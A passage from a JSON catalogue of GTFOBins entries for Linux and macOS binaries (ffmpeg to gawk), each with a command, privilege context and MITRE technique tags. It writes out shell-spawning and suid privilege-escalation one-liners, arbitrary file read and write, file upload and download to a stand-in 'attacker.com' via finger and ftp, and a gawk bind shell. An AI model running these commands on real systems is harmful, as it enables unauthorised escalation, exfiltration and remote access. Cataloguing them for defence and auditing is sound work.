/path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"]},{"id":"gtfo:ffmpeg:library-load:0:suid","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"]},{"id":"gtfo:ffmpeg:library-load:0:unprivileged","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"]},{"id":"gtfo:fgrep:file-read:0:sudo","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fgrep/"]},{"id":"gtfo:fgrep:file-read:0:suid","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fgrep/"]},{"id":"gtfo:fgrep:file-read:0:unprivileged","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fgrep/"]},{"id":"gtfo:file:file-read:0:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:0:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:0:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:1:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:1:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:file:file-read:1:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"]},{"id":"gtfo:find:file-read:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-read:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-read:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-write:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-write:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:file-write:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:shell:0:sudo","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:shell:0:suid","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh -p \\; -quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:find:shell:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"]},{"id":"gtfo:finger:download:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:download:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:download:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:upload:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:upload:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:finger:upload:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"]},{"id":"gtfo:firejail:shell:0:sudo","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/firejail/"]},{"id":"gtfo:firejail:shell:0:unprivileged","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/firejail/"]},{"id":"gtfo:fish:shell:0:sudo","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fish/"]},{"id":"gtfo:fish:shell:0:suid","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fish/"]},{"id":"gtfo:fish:shell:0:unprivileged","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fish/"]},{"id":"gtfo:flock:shell:0:sudo","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/flock/"]},{"id":"gtfo:flock:shell:0:suid","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/flock/"]},{"id":"gtfo:flock:shell:0:unprivileged","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/flock/"]},{"id":"gtfo:fmt:file-read:0:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:0:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:0:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:1:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:1:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fmt:file-read:1:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"]},{"id":"gtfo:fold:file-read:0:sudo","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fold/"]},{"id":"gtfo:fold:file-read:0:suid","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fold/"]},{"id":"gtfo:fold:file-read:0:unprivileged","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fold/"]},{"id":"gtfo:forge:shell:0:sudo","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/forge/"]},{"id":"gtfo:forge:shell:0:suid","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/forge/"]},{"id":"gtfo:forge:shell:0:unprivileged","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/forge/"]},{"id":"gtfo:fping:file-read:0:sudo","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fping/"]},{"id":"gtfo:fping:file-read:0:suid","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fping/"]},{"id":"gtfo:fping:file-read:0:unprivileged","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fping/"]},{"id":"gtfo:ftp:download:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:download:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:download:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:shell:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:shell:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:shell:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:upload:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:upload:0:suid","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:ftp:upload:0:unprivileged","toolId":"gtfo:ftp","toolName":"ftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ftp -a attacker.com\nput /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection string.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ftp/"]},{"id":"gtfo:fzf:command:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:command:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:command:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"fzf --listen=12345","description":"Commands can be issued via POST requests, for example:\n\n```\ncurl http://localhost:12345 -d 'execute(/path/to/command)'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:shell:0:sudo","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:shell:0:suid","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:fzf:shell:0:unprivileged","toolId":"gtfo:fzf","toolName":"fzf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fzf --bind 'enter:execute(/bin/sh)'","description":"Press `Enter` to receive the shell.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fzf/"]},{"id":"gtfo:gawk:bind-shell:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:bind-shell:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:bind-shell:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"gawk 'BEGIN {\n s = \"/inet/tcp/12345/0/0\";\n while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-read:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-read:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-read:0:unprivileged","toolId":"gtfo:gawk","toolName":"gawk","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"gawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-write:0:sudo","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/gawk/"]},{"id":"gtfo:gawk:file-write:0:suid","toolId":"gtfo:gawk","toolName":"gawk","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"gawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" 